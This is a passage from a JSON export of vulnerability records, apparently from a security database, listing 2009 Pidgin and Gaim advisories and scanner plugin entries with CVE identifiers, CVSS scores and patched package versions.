"lastseen": "2017-10-29T13:34:30"}, {"id": "FREEBSD_PKG_B1CA65E65AAF11DEBC9B0030843D3802.NASL", "type": "nessus", "title": "FreeBSD : pidgin -- multiple vulnerabilities (b1ca65e6-5aaf-11de-bc9b-0030843d3802)", "description": "Secunia reports :\n\nSome vulnerabilities and weaknesses have been reported in Pidgin, which can be exploited by malicious people to cause a DoS or to potentially compromise a user's system.\n\nA truncation error in the processing of MSN SLP messages can be exploited to cause a buffer overflow.\n\nA boundary error in the XMPP SOCKS5 'bytestream' server when initiating an outgoing file transfer can be exploited to cause a buffer overflow.\n\nA boundary error exists in the implementation of the 'PurpleCircBuffer' structure. This can be exploited to corrupt memory and cause a crash via specially crafted XMPP or Sametime packets.\n\nA boundary error in the 'decrypt_out()' function can be exploited to cause a stack-based buffer overflow with 8 bytes and crash the application via a specially crafted QQ packet.", "published": "2009-06-17T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=39426", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2017-10-29T13:43:27"}], "openvas": [{"id": "OPENVAS:64176", "type": "openvas", "title": "Ubuntu USN-781-2 (gaim)", "description": "The remote host is missing an update to gaim\nannounced via advisory USN-781-2.", "published": "2009-06-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64176", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2017-12-04T11:28:11"}, {"id": "OPENVAS:136141256231064784", "type": "openvas", "title": "FreeBSD Ports: pidgin, libpurple, finch", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "published": "2009-09-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064784", "cvelist": ["CVE-2009-1376", "CVE-2009-2694"], "lastseen": "2018-04-06T11:37:12"}, {"id": "OPENVAS:64784", "type": "openvas", "title": "FreeBSD Ports: pidgin, libpurple, finch", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "published": "2009-09-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64784", "cvelist": ["CVE-2009-1376", "CVE-2009-2694"], "lastseen": "2017-07-02T21:13:46"}, {"id": "OPENVAS:64753", "type": "openvas", "title": "Debian Security Advisory DSA 1870-1 (pidgin)", "description": "The remote host is missing an update to pidgin\nannounced via advisory DSA 1870-1.", "published": "2009-09-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64753", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-2694"], "lastseen": "2017-07-24T12:56:09"}, {"id": "OPENVAS:1361412562310880734", "type": "openvas", "title": "CentOS Update for pidgin CESA-2009:1059 centos3 i386", "description": "Check for the Version of pidgin", "published": "2011-08-09T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880734", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2018-04-09T11:36:55"}, {"id": "OPENVAS:64286", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:140 (gaim)", "description": "The remote host is missing an update to gaim\nannounced via advisory MDVSA-2009:140.", "published": "2009-06-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64286", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2017-07-24T12:57:08"}, {"id": "OPENVAS:136141256231064753", "type": "openvas", "title": "Debian Security Advisory DSA 1870-1 (pidgin)", "description": "The remote host is missing an update to pidgin\nannounced via advisory DSA 1870-1.", "published": "2009-09-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064753", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-2694"], "lastseen": "2018-04-06T11:37:36"}, {"id": "OPENVAS:136141256231064019", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1059", "description": "The remote host is missing updates to Pidgin announced in\nadvisory RHSA-2009:1059.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to this update package, which contains\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.", "published": "2009-05-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064019", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2018-04-06T11:37:57"}, {"id": "OPENVAS:136141256231064286", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:140 (gaim)", "description": "The remote host is missing an update to gaim\nannounced via advisory MDVSA-2009:140.", "published": "2009-06-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064286", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2018-04-06T11:40:23"}, {"id": "OPENVAS:136141256231064051", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:1059 (pidgin)", "description": "The remote host is missing updates to pidgin announced in\nadvisory CESA-2009:1059.", "published": "2009-05-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064051", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2018-04-06T11:37:22"}], "ubuntu": [{"id": "USN-781-2", "type": "ubuntu", "title": "Gaim vulnerabilities", "description": "It was discovered that Gaim did not properly handle certain malformed messages when sending a file using the XMPP protocol handler. If a user were tricked into sending a file, a remote attacker could send a specially crafted response and cause Gaim to crash, or possibly execute arbitrary code with user privileges. (CVE-2009-1373)\n\nIt was discovered that Gaim did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. (CVE-2009-1376)", "published": "2009-06-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://usn.ubuntu.com/781-2/", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2018-03-29T18:19:59"}, {"id": "USN-781-1", "type": "ubuntu", "title": "Pidgin vulnerabilities", "description": "It was discovered that Pidgin did not properly handle certain malformed messages when sending a file using the XMPP protocol handler. If a user were tricked into sending a file, a remote attacker could send a specially crafted response and cause Pidgin to crash, or possibly execute arbitrary code with user privileges. (CVE-2009-1373)\n\nIt was discovered that Pidgin did not properly handle certain malformed messages in the QQ protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash. This issue only affected Ubuntu 8.10 and 9.04. (CVE-2009-1374)\n\nIt was discovered that Pidgin did not properly handle certain malformed messages in the XMPP and Sametime protocol handlers. A remote attacker could send a specially crafted message and cause Pidgin to crash. (CVE-2009-1375)\n\nIt was discovered that Pidgin did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. (CVE-2009-1376)", "published": "2009-06-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://usn.ubuntu.com/781-1/", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2018-03-29T18:20:25"}, {"id": "USN-886-1", "type": "ubuntu", "title": "Pidgin vulnerabilities", "description": "It was discovered that Pidgin did not properly handle certain topic messages in the IRC protocol handler. If a user were tricked into connecting to a malicious IRC server, an attacker could cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.04 LTS, Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-2703)\n\nIt was discovered that Pidgin did not properly enforce the \u201crequire TLS/SSL\u201d setting when connecting to certain older Jabber servers. If a remote attacker were able to perform a man-in-the-middle attack, this flaw could be exploited to view sensitive information. This issue only affected Ubuntu 8.04 LTS, Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-3026)\n\nIt was discovered that Pidgin did not properly handle certain SLP invite messages in the MSN protocol handler. A remote attacker could send a specially crafted invite message and cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.04 LTS, Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-3083)\n\nIt was discovered that Pidgin did not properly handle certain errors in the XMPP protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-3085)\n\nIt was discovered that Pidgin did not properly handle malformed contact-list data in the OSCAR protocol handler. A remote attacker could send specially crafted contact-list data and cause Pidgin to crash, leading to a denial of service. (CVE-2009-3615)\n\nIt was discovered that Pidgin did not properly handle custom smiley requests in the MSN protocol handler. A remote attacker could send a specially crafted filename in a custom smiley request and obtain arbitrary files via directory traversal. This issue only affected Ubuntu 8.10, Ubuntu 9.04 and Ubuntu 9.10. (CVE-2010-0013)\n\nPidgin for Ubuntu 8.04 LTS was also updated to fix connection issues with the MSN protocol.\n\nUSN-675-1 and USN-781-1 provided updated Pidgin packages to fix multiple security vulnerabilities in Ubuntu 8.04 LTS. The security patches to fix CVE-2008-2955 and CVE-2009-1376 were incomplete. This update corrects the problem. Original advisory details:\n\nIt was discovered that Pidgin did not properly handle file transfers containing a long filename and special characters in the MSN protocol handler. A remote attacker could send a specially crafted filename in a file transfer request and cause Pidgin to crash, leading to a denial of service. (CVE-2008-2955)\n\nIt was discovered that Pidgin did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. (CVE-2009-1376)", "published": "2010-01-18T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://usn.ubuntu.com/886-1/", "cvelist": ["CVE-2009-3085", "CVE-2009-3083", "CVE-2009-1376", "CVE-2009-3026", "CVE-2010-0013", "CVE-2009-2703", "CVE-2009-3615", "CVE-2008-2955"], "lastseen": "2018-03-29T18:19:46"}, {"id": "USN-820-1", "type": "ubuntu", "title": "Pidgin vulnerability", "description": "Federico Muttis discovered that Pidgin did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges.", "published": "2009-08-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://usn.ubuntu.com/820-1/", "cvelist": ["CVE-2009-2694"], "lastseen": "2018-03-29T18:20:48"}], "oraclelinux": [{"id": "ELSA-2009-1059", "type": "oraclelinux", "title": "pidgin security update", "description": "[1.5.1-3]\n- CVE-2009-1373\n- CVE-2009-1376 ", "published": "2009-05-22T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://linux.oracle.com/errata/ELSA-2009-1059.html", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2016-09-04T11:17:07"}, {"id": "ELSA-2009-1060", "type": "oraclelinux", "title": "pidgin security update", "description": "[2.5.5-2]\n- Security/DoS fixes from 2.5.6\n CVE-2009-1373-8331e31a\n CVE-2009-1374-ad057b75\n 2c9a1153\n CVE-2009-1375-7829ec76\n CVE-2009-1376-9dd1c4c3 ", "published": "2009-05-26T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://linux.oracle.com/errata/ELSA-2009-1060.html", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2016-09-04T11:16:38"}, {"id": "ELSA-2009-1218", "type": "oraclelinux", "title": "pidgin security update", "description": " \n[2.5.9-1]\r\n- CVE-2009-2694 ", "published": "2009-08-18T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://linux.oracle.com/errata/ELSA-2009-1218.html", "cvelist": ["CVE-2009-2694"], "lastseen": "2016-09-04T11:16:03"}, {"id": "ELSA-2009-1453", "type": "oraclelinux", "title": "pidgin security update", "description": "[2.6.2-2]\n- Upstream backports:\n 97e003ed2bc2bafbb993693c9ae9c6d667731cc1 aim-buddy-status-grab\n 37aa00d044431100d37466517568640cb082680c yahoo-buddy-idle-time\n 40005b889ee276fbcd0a4e886a68d8a8cce45698 yahoo-status-change-away\n cb46b045aa6e927a3814d9053c2b1c0f08d6fa62 crash-validate-jid\n[2.6.2-1.1]\n- VV support needs to be explicitly disabled on F10\n[2.6.2-1]\n- 2.6.2 Fixes a number of crashes\n- CVE-2009-2703, CVE-2009-3083, CVE-2009-3084, CVE-2009-3085\n[2.6.1-1]\n- 2.6.1: Fix a crash when some users send you a link in a Yahoo IM\n[2.6.0-1]\n- CVE-2009-2694\n- Voice and Video support via farsight2 (Fedora 11+)\n- Numerous other bug fixes\n[2.6.0-0.11.20090812]\n- new snapshot at the request of maiku\n[2.6.0-0.10.20090806]\n- new snapshot - theoretically better sound quality in voice chat\n[2.6.0-0.9.20090804]\n- new snapshot\n[2.6.0-0.8.20090727]\n- new snapshot\n[2.6.0-0.6.20090721]\n- Prevent main libpurple & pidgin packages depending on perl (#513902)\n[2.6.0-0.5.20090721]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n[2.6.0-0.4.20090721]\n- rebuild\n[2.6.0-0.3.20090721]\n- prevent crash with no camera when closing vv window\n[2.6.0-0.1.20090721]\n- 2.6.0 snapshot with voice and video support via farsight2\n[2.5.8-2]\n- Backport patch from upstream to enable NSS to recognize root CA\n certificates that use MD2 & MD4 algorithms in their signature, as\n used by some MSN and XMPP servers ", "published": "2009-09-21T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://linux.oracle.com/errata/ELSA-2009-1453.html", "cvelist": ["CVE-2009-3084", "CVE-2009-3085", "CVE-2009-3083", "CVE-2009-3026", "CVE-2009-2703", "CVE-2009-2694"], "lastseen": "2016-09-04T11:15:58"}], "centos": [{"id": "CESA-2009:1059", "type": "centos", "title": "pidgin security update", "description": "**CentOS Errata and Security Advisory** CESA-2009:1059\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to this update package, which contains\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015889.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015890.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015933.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015935.html\n\n**Affected packages:**\npidgin\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1059.html", "published": "2009-05-22T15:04:17", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2009-May/015889.html", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2017-10-03T18:25:12"}, {"id": "CESA-2009:1060", "type": "centos", "title": "finch, libpurple, pidgin security update", "description": "**CentOS Errata and Security Advisory** CESA-2009:1060\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data can be\noverwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is expanded.\nIf the buffer is full when more data arrives, the data stored in this\nbuffer becomes corrupted. This corrupted data could result in confusing or\nmisleading data being presented to the user, or possibly crash Pidgin.\n(CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015891.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015892.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015937.html\n\n**Affected packages:**\nfinch\nfinch-devel\nlibpurple\nlibpurple-devel\nlibpurple-perl\nlibpurple-tcl\npidgin\npidgin-devel\npidgin-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1060.html", "published": "2009-05-22T22:24:35", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2009-May/015891.html", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2017-10-03T18:26:08"}, {"id": "CESA-2009:1218", "type": "centos", "title": "finch, libpurple, pidgin security update", "description": "**CentOS Errata and Security Advisory** CESA-2009:1218\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in Pidgin's\nMSN protocol handler. If a user received a malicious MSN message, it was\npossible to execute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages from\nusers on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which resolve\nthis issue. Pidgin must be restarted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/016099.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/016100.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/016101.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/016102.html\n\n**Affected packages:**\nfinch\nfinch-devel\nlibpurple\nlibpurple-devel\nlibpurple-perl\nlibpurple-tcl\npidgin\npidgin-devel\npidgin-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1218.html", "published": "2009-08-18T20:24:05", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2009-August/016099.html", "cvelist": ["CVE-2009-2694"], "lastseen": "2017-10-03T18:24:59"}], "redhat": [{"id": "RHSA-2009:1059", "type": "redhat", "title": "(RHSA-2009:1059) Important: pidgin security update", "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to this update package, which contains\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.", "published": "2009-05-22T04:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2009:1059", "cvelist": ["CVE-2009-1373", "CVE-2009-1376"], "lastseen": "2017-08-01T10:58:02"}, {"id": "RHSA-2009:1060", "type": "redhat", "title": "(RHSA-2009:1060) Important: pidgin security update", "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data can be\noverwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is expanded.\nIf the buffer is full when more data arrives, the data stored in this\nbuffer becomes corrupted. This corrupted data could result in confusing or\nmisleading data being presented to the user, or possibly crash Pidgin.\n(CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.", "published": "2009-05-22T04:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2009:1060", "cvelist": ["CVE-2009-1373", "CVE-2009-1374", "CVE-2009-1375", "CVE-2009-1376"], "lastseen": "2017-09-09T07:20:07"}, {"id": "RHSA-2009:1218", "type": "redhat", "title": "(RHSA-2009:1218) Critical: pidgin security update", "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in Pidgin's\nMSN protocol handler. If a user received a malicious MSN message, it was\npossible to execute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages from\nusers on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which resolve\nthis issue. Pidgin must be restarted for this update to take effect.", "published": "2009-08-18T04:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2009:1218", "cvelist": ["CVE-2009-2694"], "lastseen": "2017-09-09T07:20:01"}], "debian": [{"id": "DSA-1805", "type": "debian", "title": "pidgin -- several vulnerabilities", "description": "Several vulnerabilities have been discovered in Pidgin, a graphical multi-protocol instant messaging client. The Common Vulnerabilities and Exposures project identifies the following problems:\n\n * [CVE-2009-1373](<https://security-tracker.debian.org/tracker/CVE-2009-1373>)\n\nA buffer overflow in the Jabber file transfer code may lead to denial of service or the execution of arbitrary code.\n\n * [CVE-2009-1375](<https://security-tracker.debian.org/tracker/CVE-2009-1375>)\n\nMemory corruption in an internal library may lead to denial of service.\n\n * [CVE-2009-1376](<https://security-tracker.debian.org/tracker/CVE-2009-1376>)\n\nThe patch provided for the security issue tracked as [CVE-2008-2927](<https://security-tracker.debian.org/tracker/CVE-2008-2927>) \\- integer overflows in the MSN protocol handler - was found to be incomplete.\n\nThe old stable distribution (etch) is affected under the source package name gaim. However, due to build problems the updated packages couldn't be released along with the stable version. It will be released once the build problem is resolved.\n\nFor the stable distribution (lenny), these problems have been fixed in version 2.4.3-4lenny2.\n\nFor the unstable distribution (sid), these problems have been fixed in version 2.5.6-1.\n\nWe recommend that you upgrade your pidgin packages.", "published": "2009-05-22T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.debian.org/security/dsa-1805", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1373"], "lastseen": "2016-09-02T18:22:01"}, {"id": "DSA-1870", "type": "debian", "title": "pidgin -- insufficient input validation", "description": "Federico Muttis discovered that libpurple, the shared library that adds support for various instant messaging networks to the pidgin IM client, is vulnerable to a heap-based buffer overflow. This issue exists because of an incomplete fix for [CVE-2008-2927](<https://security-tracker.debian.org/tracker/CVE-2008-2927>) and [CVE-2009-1376](<https://security-tracker.debian.org/tracker/CVE-2009-1376>). An attacker can exploit this by sending two consecutive SLP packets to a victim via MSN.\n\nThe first packet is used to create an SLP message object with an offset of zero, the second packet then contains a crafted offset which hits the vulnerable code originally fixed in [CVE-2008-2927](<https://security-tracker.debian.org/tracker/CVE-2008-2927>) and [CVE-2009-1376](<https://security-tracker.debian.org/tracker/CVE-2009-1376>) and allows an attacker to execute arbitrary code.\n\nNote: Users with the \"Allow only the users below\" setting are not vulnerable to this attack. If you can't install the below updates you may want to set this via Tools->Privacy.\n\nFor the stable distribution (lenny), this problem has been fixed in version 2.4.3-4lenny3.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in version 2.5.9-1.\n\nWe recommend that you upgrade your pidgin packages.", "published": "2009-08-19T00:00:00", 